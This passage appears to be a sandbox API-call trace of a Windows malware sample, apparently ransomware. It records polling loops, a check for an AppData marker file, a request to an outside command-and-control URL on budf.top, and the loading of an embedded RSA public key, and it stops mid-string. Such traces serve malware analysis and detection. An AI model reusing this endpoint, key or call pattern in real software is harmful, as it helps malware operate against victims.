[0189.668] Sleep (dwMilliseconds=0x64) [0189.777] timeGetTime () returned 0x113a87c [0189.777] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0189.777] Sleep (dwMilliseconds=0x64) [0189.886] timeGetTime () returned 0x113a8ea [0189.886] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0189.886] Sleep (dwMilliseconds=0x64) [0189.995] timeGetTime () returned 0x113a957 [0189.995] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0189.995] Sleep (dwMilliseconds=0x64) [0190.104] timeGetTime () returned 0x113a9c4 [0190.104] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0190.105] Sleep (dwMilliseconds=0x64) [0190.214] timeGetTime () returned 0x113aa31 [0190.214] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0190.214] Sleep (dwMilliseconds=0x64) [0190.323] timeGetTime () returned 0x113aa9e [0190.323] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0190.323] Sleep (dwMilliseconds=0x64) [0190.432] timeGetTime () returned 0x113ab0c [0190.432] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0190.432] Sleep (dwMilliseconds=0x64) [0190.541] timeGetTime () returned 0x113ab79 [0190.541] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x99aa4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0190.541] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0190.542] AreFileApisANSI () returned 1 [0190.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x99aa4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0190.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7a) returned 0x3215a0 [0190.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x99aa4e4, cbMultiByte=-1, lpWideCharStr=0x3215a0, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0190.542] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x99aa368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0190.542] GetLastError () returned 0x2 [0190.542] GetLastError () returned 0x2 [0190.542] SetLastError (dwErrCode=0x2) [0190.542] GetLastError () returned 0x2 [0190.542] SetLastError (dwErrCode=0x2) [0190.542] GetLastError () returned 0x2 [0190.542] SetLastError (dwErrCode=0x2) [0190.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0190.542] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0190.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384310 [0190.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2eed00 [0190.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384310 | out: hHeap=0x2c0000) returned 1 [0190.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32bff40 [0190.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x32d7d08 [0190.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32bff40, cbMultiByte=-1, lpWideCharStr=0x32d7d08, cchWideChar=1056 | out: lpWideCharStr="B56D42C81778FD36CA7BD76E3CC6490E") returned 33 [0190.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x32ea568 [0190.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d7d08 | out: hHeap=0x2c0000) returned 1 [0190.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32bff40 | out: hHeap=0x2c0000) returned 1 [0190.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x32d7d08 [0190.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed00 | out: hHeap=0x2c0000) returned 1 [0190.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ea568 | out: hHeap=0x2c0000) returned 1 [0190.543] lstrcpyW (in: lpString1=0x99aaf78, lpString2="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E" [0190.543] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0x0 [0192.837] InternetReadFile (in: hFile=0x0, lpBuffer=0x99aa778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x99aa604 | out: lpBuffer=0x99aa778, lpdwNumberOfBytesRead=0x99aa604) returned 0 [0192.837] InternetCloseHandle (hInternet=0x0) returned 0 [0192.837] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0192.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d7d08 | out: hHeap=0x2c0000) returned 1 [0192.837] timeGetTime () returned 0x113b46e [0192.837] timeGetTime () returned 0x113b46e [0192.837] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0192.837] Sleep (dwMilliseconds=0x64) [0192.943] timeGetTime () returned 0x113b4db [0192.943] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0192.943] Sleep (dwMilliseconds=0x64) [0193.053] timeGetTime () returned 0x113b548 [0193.053] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0193.053] Sleep (dwMilliseconds=0x64) [0193.162] timeGetTime () returned 0x113b5b6 [0193.162] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0193.162] Sleep (dwMilliseconds=0x64) [0193.271] timeGetTime () returned 0x113b623 [0193.271] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0193.271] Sleep (dwMilliseconds=0x64) [0193.380] timeGetTime () returned 0x113b690 [0193.380] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0193.380] Sleep (dwMilliseconds=0x64) [0193.490] timeGetTime () returned 0x113b6fd [0193.490] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0193.491] Sleep (dwMilliseconds=0x64) [0193.599] timeGetTime () returned 0x113b76a [0193.599] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0193.599] Sleep (dwMilliseconds=0x64) [0193.708] timeGetTime () returned 0x113b7d8 [0193.708] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0193.708] Sleep (dwMilliseconds=0x64) [0193.817] timeGetTime () returned 0x113b845 [0193.817] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0193.817] Sleep (dwMilliseconds=0x64) [0193.926] timeGetTime () returned 0x113b8b2 [0193.926] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0193.926] Sleep (dwMilliseconds=0x64) [0194.036] timeGetTime () returned 0x113b91f [0194.036] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0194.036] Sleep (dwMilliseconds=0x64) [0194.145] timeGetTime () returned 0x113b98c [0194.145] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0194.145] Sleep (dwMilliseconds=0x64) [0194.254] timeGetTime () returned 0x113b9fa [0194.254] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0194.254] Sleep (dwMilliseconds=0x64) [0194.363] timeGetTime () returned 0x113ba67 [0194.363] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0194.363] Sleep (dwMilliseconds=0x64) [0194.472] timeGetTime () returned 0x113bad4 [0194.472] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0194.472] Sleep (dwMilliseconds=0x64) [0194.582] timeGetTime () returned 0x113bb41 [0194.582] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0194.582] Sleep (dwMilliseconds=0x64) [0194.691] timeGetTime () returned 0x113bbae [0194.691] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0194.691] Sleep (dwMilliseconds=0x64) [0194.802] timeGetTime () returned 0x113bc1c [0194.802] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0194.802] Sleep (dwMilliseconds=0x64) [0194.909] timeGetTime () returned 0x113bc89 [0194.909] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0194.909] Sleep (dwMilliseconds=0x64) [0195.018] timeGetTime () returned 0x113bcf6 [0195.018] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0195.018] Sleep (dwMilliseconds=0x64) [0195.128] timeGetTime () returned 0x113bd63 [0195.128] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0195.128] Sleep (dwMilliseconds=0x64) [0195.237] timeGetTime () returned 0x113bdd0 [0195.237] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0195.237] Sleep (dwMilliseconds=0x64) [0195.359] timeGetTime () returned 0x113be3e [0195.359] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0195.359] Sleep (dwMilliseconds=0x64) [0195.455] timeGetTime () returned 0x113beab [0195.455] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0195.455] Sleep (dwMilliseconds=0x64) [0195.564] timeGetTime () returned 0x113bf18 [0195.564] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0195.564] Sleep (dwMilliseconds=0x64) [0195.673] timeGetTime () returned 0x113bf85 [0195.674] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0195.674] Sleep (dwMilliseconds=0x64) [0195.783] timeGetTime () returned 0x113bff2 [0195.783] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0195.783] Sleep (dwMilliseconds=0x64) [0195.892] timeGetTime () returned 0x113c060 [0195.892] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0195.892] Sleep (dwMilliseconds=0x64) [0196.001] timeGetTime () returned 0x113c0cd [0196.001] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0196.001] Sleep (dwMilliseconds=0x64) [0196.110] timeGetTime () returned 0x113c13a [0196.110] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0196.110] Sleep (dwMilliseconds=0x64) [0196.219] timeGetTime () returned 0x113c1a7 [0196.219] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0196.219] Sleep (dwMilliseconds=0x64) [0196.329] timeGetTime () returned 0x113c214 [0196.329] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0196.329] Sleep (dwMilliseconds=0x64) [0196.438] timeGetTime () returned 0x113c282 [0196.438] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0196.438] Sleep (dwMilliseconds=0x64) [0196.547] timeGetTime () returned 0x113c2ef [0196.547] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0196.547] Sleep (dwMilliseconds=0x64) [0196.656] timeGetTime () returned 0x113c35c [0196.656] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0196.656] Sleep (dwMilliseconds=0x64) [0196.766] timeGetTime () returned 0x113c3c9 [0196.766] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0196.766] Sleep (dwMilliseconds=0x64) [0196.875] timeGetTime () returned 0x113c436 [0196.875] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0196.875] Sleep (dwMilliseconds=0x64) [0196.984] timeGetTime () returned 0x113c4a4 [0196.984] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0196.984] Sleep (dwMilliseconds=0x64) [0197.093] timeGetTime () returned 0x113c511 [0197.093] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0197.093] Sleep (dwMilliseconds=0x64) [0197.203] timeGetTime () returned 0x113c57e [0197.203] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0197.203] Sleep (dwMilliseconds=0x64) [0197.312] timeGetTime () returned 0x113c5eb [0197.312] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0197.312] Sleep (dwMilliseconds=0x64) [0197.421] timeGetTime () returned 0x113c658 [0197.421] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0197.421] Sleep (dwMilliseconds=0x64) [0197.530] timeGetTime () returned 0x113c6c6 [0197.530] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0197.530] Sleep (dwMilliseconds=0x64) [0197.641] timeGetTime () returned 0x113c733 [0197.642] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0197.642] Sleep (dwMilliseconds=0x64) [0197.748] timeGetTime () returned 0x113c7a0 [0197.748] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0197.748] Sleep (dwMilliseconds=0x64) [0198.278] timeGetTime () returned 0x113c9a3 [0198.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ce630 [0198.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32c87f0 [0198.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32c8a58 [0198.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32c8cc0 [0198.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32c8f28 [0198.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32c9190 [0198.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32c93f8 [0198.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32c9660 [0198.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32c98c8 [0198.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32c9b30 [0198.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32c9d98 [0198.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32ca000 [0198.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32ca268 [0198.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32ca4d0 [0198.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32ca738 [0198.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32ca9a0 [0198.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32cac08 [0198.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x329e050 [0198.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x130) returned 0x32c1738 [0198.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329e050 | out: hHeap=0x2c0000) returned 1 [0198.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1d0) returned 0x3188b8 [0198.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c1738 | out: hHeap=0x2c0000) returned 1 [0198.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2b7) returned 0x327020 [0198.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3188b8 | out: hHeap=0x2c0000) returned 1 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ce5e8 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32cae70 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32cb0d8 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32cb340 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32cb5a8 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32cb810 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32cba78 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32efb88 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32efdf0 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f0058 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f02c0 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f0528 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f0790 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f09f8 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f0c60 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f0ec8 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f1130 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32bff40 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3188b8 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbaa) returned 0x32ea568 [0198.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3188b8, cbMultiByte=-1, lpWideCharStr=0x32ea568, cchWideChar=1493 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 470 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbb0) returned 0x32d9600 [0198.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ea568 | out: hHeap=0x2c0000) returned 1 [0198.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3188b8 | out: hHeap=0x2c0000) returned 1 [0198.285] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC 